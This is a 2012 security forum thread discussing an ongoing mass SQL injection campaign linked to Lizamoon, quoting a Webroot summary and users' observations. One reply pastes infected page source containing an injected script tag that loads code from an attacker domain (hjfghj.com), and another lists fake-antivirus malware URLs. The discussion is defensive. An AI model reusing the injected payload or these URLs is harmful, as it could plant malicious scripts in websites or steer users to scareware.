Welcome · log in · join

Search similar:

Forums → Software and Operating Systems →

Security → Tens of thousands of web sites affected in ongoing mass SQL

uniqs
1946

« Wired article explains NSA decrypting plans & new facility • PhotoDNA Technology to Help Law Enforcement Fight Child Porn »

Triple Helix Troll Hunter Premium Member join:2007-07-26 Oshawa, ON kudos:7 ·Rogers Hi-Speed	Triple Helix Premium Member 2012-Mar-26 3:54 pm Tens of thousands of web sites affected in ongoing mass SQL Tens of thousands of web sites affected in ongoing mass SQL injection attack! By Dancho Danchev Hundreds of thousands of legitimate web sites are currently affected in a a mass SQL injection attack that has been ongoing for the past several months. The ongoing mass SQL injection attacks, are directly related to last year’s scareware-serving Lizamoon mass SQL injection attacks. The cybercriminals behind it, are automatically exploiting the legitimate web sites, and embedding a tiny script on the affected pages, abusing an input validation flaw, or exploiting vulnerable and outdated versions of the web application software running on them. Full Story: »blog.webroot.com/2012/03 ··· -attack/
	· actions · 2012-Mar-26 3:54 pm ·
therube join:2004-11-11 Randallstown, MD ·Xfinity ·Verizon Online DSL 4 edits	therube Member 2012-Mar-26 4:04 pm Malwarebytes Anti-malware blocks (at least some of the associated) domains. </table><div class="rcbSlide" style="z-index:6000;"><div id="ctl00_ContentPlaceHolder1_adv1_rdcCategories_DropDown" class="RadComboBoxDropDown_Telerik" style="display:none;"><div class="rcbScroll rcbWidth" style="width:100%;"><ul class="rcbList" style="list-style:none;margin:0;padding:0;zoom:1;"> <li class="rcbItem ">Bibs and Coveralls </title><script src=http://hjfghj.com/r.php ></script></li> <li class="rcbItem ">Bibs/Pants </title><script src=http://hjfghj.com/r.php ></script></li> So it like generates itself within the page source, within legitimate code parts of the page. And since it references a foreign domain, it should be stopped right in its tracks right there. quote: all of these domains are currently returning a “404 Not Found” Wonder if that is because they're actually 404 or are just returning a "404" after the first attempted hit by a particular IP? (My initial thought. But since webroot says 404, would think they would have checked out that avenue.) Pretty lame that these sorts of things (known exploits) still exist. Might even say they are "popular".
	· actions · 2012-Mar-26 4:04 pm ·
therube 2 edits	therube Member 2012-Mar-26 4:32 pm quote: Wonder if that is because they're actually 404 or are just returning a "404" after the first attempted hit by a particular IP? (My initial thought. But since webroot says 404, would think they would have checked out that avenue.) Me thinks they are fake 404's. If not then why did a 404 redirect me to one of zee best antivir's out there? http://www1.best-ztantivir.it.cx/b5rp9vy55d? rn8y4wj7=luKu76Lfp6HJztXZouea1tfYpquhpKWUqOKYtJ1dw8fV5mrMyKyU4Nyzm6ajlKfsce7gj7KL1 d2Rt9bAtLqP39rsr9Ot353x16yIyNaxgs2ayt6xmquaoKOnbqdmq5xlk5immqDu1dXj56anj%2Bnb0nWvbZ3eq86ipKVgr9iVpqaeq6CY5uF1qmeqnG6bmKukZqDY0NvV0uSm6enlbKea4Nyq1tLhoY7s4d qc19jjj93qz6a2pOXiqNDS7Jqf39qe1ujd5o6ls5Nqv1mpsJ7R0dehlN%2Fhj9Hj1pubuLfcqe6d6eNokMbm5KWfp6e32I6praSroXCuWA%3D%3D Seemingly it is the "Emma Watson never seen before home video" that I haven't seen - yet? Whatever this does, haven't a clue? http://www1.best-ztantivir.it.cx/2746413b.js Suppose it could be a real 404, but done purposely. Only because the server is hacked with some sort of redirect, such that something like: if referrer=hnjhkm.com redirect to emmawatsonknowsbest.
	· actions · 2012-Mar-26 4:32 pm ·

Forums → Software and Operating Systems → Security	« Wired article explains NSA decrypting plans & new facility • PhotoDNA Technology to Help Law Enforcement Fight Child Porn »